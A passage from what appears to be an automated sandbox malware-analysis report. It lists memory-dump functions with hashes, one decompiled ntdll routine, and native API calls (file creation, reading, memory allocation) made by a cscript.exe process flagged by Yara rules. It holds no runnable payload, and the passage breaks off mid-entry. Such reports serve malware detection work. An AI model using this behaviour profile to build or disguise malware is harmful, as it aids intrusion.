                                              Function 00FE9650, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 084ee186a6c06921d40e0f357f3cd28a480f53bffe6b8205008fcdc37975f728
                                              • Instruction ID: da542228c26a9e3a8b1fa5d6a1023ce576b1467c509e4be9c15e4072269c23b1
                                              • Opcode Fuzzy Hash: 084ee186a6c06921d40e0f357f3cd28a480f53bffe6b8205008fcdc37975f728
                                              • Instruction Fuzzy Hash: 4690027120504C42D24071594404A5610169BD0345F52C021A1055695E96658D55F6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9610, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 435242666e8a2a9766447581b42957511a34f4f671ab7dc8691b80b614bdfff9
                                              • Instruction ID: c8386f36538f25474650723047e1910df481e76479d5526b371e2f53c82d6c57
                                              • Opcode Fuzzy Hash: 435242666e8a2a9766447581b42957511a34f4f671ab7dc8691b80b614bdfff9
                                              • Instruction Fuzzy Hash: A690027160500C02D2507159441475610069BD0341F52C021A1015655E87958A55B6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9A10, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8fbc5a29c72ae1e98a96302537cdf817bd63e04fac45f16c7248c83304cd64c6
                                              • Instruction ID: 7349a776c22612beaa369dd1d9a7ac59b3bfa6abc57a7aefb372807bf1d5c5a3
                                              • Opcode Fuzzy Hash: 8fbc5a29c72ae1e98a96302537cdf817bd63e04fac45f16c7248c83304cd64c6
                                              • Instruction Fuzzy Hash: 3E90027120140802D2006159480875710069BD0342F52C021A6155556F86A5C891B571
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FEA3B0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c9fa141b3a33d0fb8ce0d1b2b890af9b214ad067e2e8b5b9a468fd5f8b959d6
                                              • Instruction ID: 316b031c3682785855358430d43b0f1f29ed78af82e8e0b02afceebae445912e
                                              • Opcode Fuzzy Hash: 4c9fa141b3a33d0fb8ce0d1b2b890af9b214ad067e2e8b5b9a468fd5f8b959d6
                                              • Instruction Fuzzy Hash: 5B90027120144402D2407159844461B6006ABE0341F52C421E1416555D86558856F261
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9770, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e9a61bf8cc58479cfbc196597c73f45dc754060f251af94ea748c800b238bf5
                                              • Instruction ID: f288d7779d86f6b9262f2b7865686aaeb05bc6c34e0d1ede1a5baff4f3a7168d
                                              • Opcode Fuzzy Hash: 0e9a61bf8cc58479cfbc196597c73f45dc754060f251af94ea748c800b238bf5
                                              • Instruction Fuzzy Hash: B590026120504842D20065595408A1610069BD0345F52D021A2055596EC6758851F171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FEA770, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9012a7ee680d6c36c6a2094ce1f673a62d39bee25627165037fc909aa152c14f
                                              • Instruction ID: a5d8e1ddc7c4f72d48d00024feadd4651c5ef350415dfed20b1eae1d7e922f49
                                              • Opcode Fuzzy Hash: 9012a7ee680d6c36c6a2094ce1f673a62d39bee25627165037fc909aa152c14f
                                              • Instruction Fuzzy Hash: CD90027520504842D60065595804A9710069BD0345F52D421A141559DE86948861F161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9760, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: afa2aa6cbc433ee161770eea28a5a233043b17648adff360740d288d04a87c2b
                                              • Instruction ID: 0401a687bfb9e21138f73e7eeb5457160b128572ac9bb4257cea05583823edd2
                                              • Opcode Fuzzy Hash: afa2aa6cbc433ee161770eea28a5a233043b17648adff360740d288d04a87c2b
                                              • Instruction Fuzzy Hash: D490027120100803D2006159550871710069BD0341F52D421A1415559ED6968851B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9730, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed16354f90103bcdc16d6f94d58d035164b360c38d3d6d847ffef0282aae3764
                                              • Instruction ID: 5e72a04e4769699c2707708c02f1d5b0b2c072100efbe9989910579fd59c7c75
                                              • Opcode Fuzzy Hash: ed16354f90103bcdc16d6f94d58d035164b360c38d3d6d847ffef0282aae3764
                                              • Instruction Fuzzy Hash: 0A90026160500802D2407159541871610169BD0341F52D021A1015555EC6998A55B6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FEA710, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aca83e95980e3e600fcdcc49931fa77f52fbf22aa53f5aa05e5a7be9f4f47b73
                                              • Instruction ID: d5bd825d9b47240702db2574ceb2672e975a64ff5070821716da03e5d360eaa3
                                              • Opcode Fuzzy Hash: aca83e95980e3e600fcdcc49931fa77f52fbf22aa53f5aa05e5a7be9f4f47b73
                                              • Instruction Fuzzy Hash: D8900271301004529600A6995804A5A51069BF0341B52D025A5005555D85948861B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9B00, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9122c4c4f962a7250b01021b963fe1a105b0331d4b8286f2d0f630ca0975e523
                                              • Instruction ID: 442a69b6cf0d632e566933417f19f4fd0b3cd30334433875a4f84e92ef26e93d
                                              • Opcode Fuzzy Hash: 9122c4c4f962a7250b01021b963fe1a105b0331d4b8286f2d0f630ca0975e523
                                              • Instruction Fuzzy Hash: 6590026124100C02D240715984147171007DBD0741F52C021A1015555E86568965B6F1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00FE9670, Relevance: .0, Instructions: 2COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: baa0556110511710561c96ac1e9ce9ed5320d444bae1012285f46e5151337cb3
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0103FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 53%
                                              			E0103FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00FECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01035720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01035720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                              0x0103fdda
                                              0x0103fde2
                                              0x0103fde5
                                              0x0103fdec
                                              0x0103fdfa
                                              0x0103fdff
                                              0x0103fe0a
                                              0x0103fe0f
                                              0x0103fe17
                                              0x0103fe1e
                                              0x0103fe19
                                              0x0103fe19
                                              0x0103fe19
                                              0x0103fe20
                                              0x0103fe21
                                              0x0103fe22
                                              0x0103fe25
                                              0x0103fe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0103FDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0103FE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0103FE01
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 5eba94f90e07cb0e5d1e4202600a08f6f6d0fe37931a17c35664057ca8cf2292
                                              • Instruction ID: 4ba9bd8734d97cc55d6d953e291a40347b041a8e98cc385aa41500da1d72e27a
                                              • Opcode Fuzzy Hash: 5eba94f90e07cb0e5d1e4202600a08f6f6d0fe37931a17c35664057ca8cf2292
                                              • Instruction Fuzzy Hash: 9CF0F632640202BFEA211A49DC02F63BF5EEB84B30F140314F668561E1DA62F82096F1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Analysis Process: cscript.exe PID: 5360 Parent PID: 3352 cscript.exeCOMMON

                                              Executed Functions

                                              Function 001685EB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00163BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00163BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0016863D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`
                                              • API String ID: 823142352-1441809116
                                              • Opcode ID: ff5d448eff0e32eb58a503c0a23eb2a23968ac6f405612a2d4973c508889f361
                                              • Instruction ID: 7a48cb8db58065d89ea092e4ca246d730f8ed2668f2b063519b42218ed97c2e2
                                              • Opcode Fuzzy Hash: ff5d448eff0e32eb58a503c0a23eb2a23968ac6f405612a2d4973c508889f361
                                              • Instruction Fuzzy Hash: 6201AFB2245108AFCB08CF98DC95EEB77A9AF9C354F158248FA1D97241D630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001685F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00163BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00163BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0016863D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`
                                              • API String ID: 823142352-1441809116
                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction ID: 9f7b0c1446f337d324f06736a25229e6f12aedc5ad3d4110de591d7b79788410
                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction Fuzzy Hash: F6F0BDB2200208ABCB08CF88DC85EEB77EDAF8C754F158248BA0D97241C630E811CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0016871A, Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtClose.NTDLL(00163D60,?,?,00163D60,00000000,FFFFFFFF), ref: 00168745
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: e38eaebc72375dbc8d4f18041b72683b0b7b1fa2d1be8f78124c1b96cf0a84cb
                                              • Instruction ID: 6df237cb702c6fbb00068729910f96304784c88c3ba45fb0d627b2ee558f2ddf
                                              • Opcode Fuzzy Hash: e38eaebc72375dbc8d4f18041b72683b0b7b1fa2d1be8f78124c1b96cf0a84cb
                                              • Instruction Fuzzy Hash: 1C015E76200208AFDB14DF98CC85EEB77ADEF89310F118558BE0C97242C630E910CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001686A0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtReadFile.NTDLL(00163D82,5E972F65,FFFFFFFF,00163A41,?,?,00163D82,?,00163A41,FFFFFFFF,5E972F65,00163D82,?,00000000), ref: 001686E5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction ID: a8d2c0eef6077805fd3a2d456351f035955919c385051368adaad75faf922292
                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction Fuzzy Hash: 85F0A4B2200208ABCB14DF8DDC85EEB77ADAF8C754F158248BE1D97241D630E811CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001687CA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00152D11,00002000,00003000,00000004), ref: 00168809
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 764bd77962477d57291ca3809ad34b303e7b23d738b60c58afc3547f8011096f
                                              • Instruction ID: 10db05d09df6306e14209306b27a026745874efe553780850df6654fd3d860d3
                                              • Opcode Fuzzy Hash: 764bd77962477d57291ca3809ad34b303e7b23d738b60c58afc3547f8011096f
                                              • Instruction Fuzzy Hash: 59F015B6210159AFDB18DF88CC85EAB77ADFF89354F118589FE5A97241C630E811CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001687D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00152D11,00002000,00003000,00000004), ref: 00168809
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction ID: a9aaf8c2684a50135704907fe68aa80d412a49c82eaa100644afe9b5bb3c4abc
                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction Fuzzy Hash: E3F015B2200208ABCB14DF89CC81EAB77ADAF88750F118148BE0897241C630F810CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00168720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtClose.NTDLL(00163D60,?,?,00163D60,00000000,FFFFFFFF), ref: 00168745
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction ID: b88fafdb867a33fcee9b14bbe209ca13f46b28f4b29ac406ffea59cf908ec830
                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction Fuzzy Hash: C5D01776200218ABD710EB98CC89EA77BACEF48760F154499BA189B242C630FA1086E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04779860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 92d6776fad4ad525ae32368690aa2c556c6033913f99fb2ef3712c8b39c77a81
                                              • Instruction ID: 356edf8a4880885a38f981b1f7cb51325498aa8af4b22352ec53afeccdb78dc1
                                              • Opcode Fuzzy Hash: 92d6776fad4ad525ae32368690aa2c556c6033913f99fb2ef3712c8b39c77a81
                                              • Instruction Fuzzy Hash: 6590027124100417F12171598504B07000997E4285F91C426E041556CD9696D956B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04779840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 052c9d9e48669c52b1db094dca336106c5b2d81c5fe9bf00dda5ad79a2cc27b5
                                              • Instruction ID: e9182d5674df18e909ebbbe354946ca3a1ddf629a08fb0611876639156d16006
                                              • Opcode Fuzzy Hash: 052c9d9e48669c52b1db094dca336106c5b2d81c5fe9bf00dda5ad79a2cc27b5
                                              • Instruction Fuzzy Hash: E8900271282041567555B15984049074006A7F4285791C026E1405964C8566E85AF661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04779540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4a23e7bfd24764abea7aef1b5907ad3907d23d2ad6cdc44de16ac624d6eed54a
                                              • Instruction ID: 014803386cd8810602c251efe0935cf1a4baac3dcc5d38263e231dc1db4d369a
                                              • Opcode Fuzzy Hash: 4a23e7bfd24764abea7aef1b5907ad3907d23d2ad6cdc44de16ac624d6eed54a
                                              • Instruction Fuzzy Hash: AC900275251000072115B5594704907004697E9395351C035F1006564CD661D8657161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04779910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 478bcfdae1b57f3de11369c92c438c8d5993098611d7834981c84dee63299966
                                              • Instruction ID: 74aa8e86e2f7bb37929717a47a70ff237d1053beaa36617bd96d71a4dd707d8a
                                              • Opcode Fuzzy Hash: 478bcfdae1b57f3de11369c92c438c8d5993098611d7834981c84dee63299966
                                              • Instruction Fuzzy Hash: E09002B124100406F15071598404B46000597E4345F51C025E5055568E8699DDD976A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 047795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 5c1fccf4d08f655f4b984e910c3469de88d498ce1230809278a7bc2351e744ca
                                              • Instruction ID: 0285e9a219eecfcee0d3d06970f113eedea83386e4e323b86394dc11226a7b31
                                              • Opcode Fuzzy Hash: 5c1fccf4d08f655f4b984e910c3469de88d498ce1230809278a7bc2351e744ca
                                              • Instruction Fuzzy Hash: 4D9002B124200007611571598414A16400A97F4245B51C035E10055A4DC565D8957165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 047799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3164e1acd64d050efa56df02e126c996f7025b9ba590d28258a871f74d7c9367
                                              • Instruction ID: 6eb0536df7aa76879015fc4e4c51f8e867ee5c2c6263e31910def88e0237a7e6
                                              • Opcode Fuzzy Hash: 3164e1acd64d050efa56df02e126c996f7025b9ba590d28258a871f74d7c9367
                                              • Instruction Fuzzy Hash: DB9002B138100446F11071598414F060005D7F5345F51C029E1055568D8659DC567166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04779660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 49e9a3b5a0dc50e78b9504f195f9b46123f8f0926a5eed710a922e983a5ccbbb
                                              • Instruction ID: 5584065e4659a6f654b6ed98886a48f8ed3146c547bc0abd48e41dbbb9215a97
                                              • Opcode Fuzzy Hash: 49e9a3b5a0dc50e78b9504f195f9b46123f8f0926a5eed710a922e983a5ccbbb
                                              • Instruction Fuzzy Hash: 5590027124100806F19071598404A4A000597E5345F91C029E0016668DCA55DA5D77E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04779650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 5630d5d60942fa2f3e54c4d65e820debb29c65710ab39171ed9fc58d2ba97a16
                                              • Instruction ID: d3fe303099351703a85c377f53a3ef3396e372accd24bd13159cce221aaaee8f
                                              • Opcode Fuzzy Hash: 5630d5d60942fa2f3e54c4d65e820debb29c65710ab39171ed9fc58d2ba97a16
                                              • Instruction Fuzzy Hash: 7B90027124504846F15071598404E46001597E4349F51C025E00556A8D9665DD59B6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04779A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6511ed7942e651bbf6f9128f594b8f2b548ba181a5b8f66c1fc05159fa31484b
                                              • Instruction ID: da1b5b1533e02d3d9bfbded9e282c543c35d2a227b6d9b7ee6d109a17ad8b6ea
                                              • Opcode Fuzzy Hash: 6511ed7942e651bbf6f9128f594b8f2b548ba181a5b8f66c1fc05159fa31484b
                                              • Instruction Fuzzy Hash: EB90027125180046F21075698C14F07000597E4347F51C129E0145568CC955D8657561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 047796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: db0735b18d546544b6607461e4394b7b13f0f9c8f33025e7c289e36645050491
                                              • Instruction ID: edab0d42843aaa35cee782205310f3b0cd00cd190351771c6fb6a8024e779e0f
                                              • Opcode Fuzzy Hash: db0735b18d546544b6607461e4394b7b13f0f9c8f33025e7c289e36645050491
                                              • Instruction Fuzzy Hash: A990027124108806F1207159C404B4A000597E4345F55C425E441566CD86D5D8957161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 047796D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
